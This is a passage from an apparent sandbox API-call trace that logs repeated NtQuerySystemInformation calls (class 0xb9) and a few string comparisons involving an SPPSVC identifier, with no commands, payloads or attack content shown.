_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed60, Length=0x20, ResultLength=0x0) [0239.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x20, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x20, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x20, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.626] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.634] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.642] NtQuerySystemInformation 